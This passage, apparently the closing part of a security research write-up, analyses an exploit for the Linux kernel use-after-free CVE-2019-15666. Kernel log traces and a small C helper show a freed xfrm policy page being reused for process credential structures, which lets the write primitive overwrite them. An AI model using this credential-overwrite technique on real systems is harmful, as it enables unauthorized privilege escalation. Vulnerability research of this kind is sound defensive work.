Apr 13 15:57:00 ubuntu18 kernel: [   78.548715] SLAB free: ffff88002dd58000 -> ffff88002dd5c000
Apr 13 15:57:00 ubuntu18 kernel: [   78.548720] SLAB free: ffff88002dd50000 -> ffff88002dd54000
Apr 13 15:57:00 ubuntu18 kernel: [   78.556735] SLAB free: ffff88002dd4c000 -> ffff88002dd50000
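The address arithmetic behind this check can be replayed with the logged values. In the sketch below, the offset of bydst.next comes from the gdb dump of struct xfrm_policy, while the addr_range structure and the two helpers are hypothetical names introduced for the illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* bydst.next sits at offset 8 in struct xfrm_policy (see the gdb dump). */
#define BYDST_NEXT_OFFSET 8

/* Half-open address range [start, end), as printed by the trace. */
struct addr_range {
    uint64_t start;
    uint64_t end;
};

/* Base address of the policy whose bydst.next field is targeted by pprev. */
uint64_t policy_base_from_pprev(uint64_t pprev)
{
    return pprev - BYDST_NEXT_OFFSET;
}

/* Returns the index of the first range containing `addr`, or -1. */
int find_range(const struct addr_range *ranges, size_t count, uint64_t addr)
{
    size_t i;

    assert(ranges != NULL || count == 0);

    for (i = 0; i < count; i++) {
        if (addr >= ranges[i].start && addr < ranges[i].end)
            return (int)i;
    }
    return -1;
}
```

Fed with the three "SLAB free" ranges above, find_range() places the base address 0xffff88002dd5a000 in the first one, 0xffff88002dd58000 to 0xffff88002dd5c000.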

The page was later reused for a 192-byte slab:

# cat $( ls -tr /var/log/syslog* ) | grep "SLAB alloc" | grep ffff88002dd5a000
Apr 13 15:57:01 ubuntu18 kernel: [   79.373317] SLAB alloc: ffff88002dd59000 -> ffff88002dd5a000
Apr 13 15:57:01 ubuntu18 kernel: [   79.374448] SLAB alloc: ffff88002dd5a000 -> ffff88002dd5b000

And there were indeed struct cred objects allocated for a lucky process at the location of the old policy #0:

# cat $( ls -tr /var/log/syslog* ) | grep "CRED" | grep ffff88002dd5a000
Apr 13 15:57:01 ubuntu18 kernel: [   79.374450] CRED alloc: ffff88002dd5a000
Apr 13 15:57:06 ubuntu18 kernel: [   84.454714] CRED alloc: ffff88002dd5a000

So the write primitive gained from the UAF has overwritten the process credentials.

Conclusion

In the end, we took a deep dive into the inner workings of this exploit for CVE-2019-15666. We tried to introduce all the concepts needed to understand how the vulnerability operates and shared interesting bits found when reversing the binary.

We also included all the details needed for someone to try and reproduce our research.

Following this, there are still lots of things that could be done to further the research. One thing to do would be to try and improve the success rate of the race condition, as it still takes some time to exploit a vulnerable system. It would also be interesting to port the exploit to other platforms that fulfill the required conditions.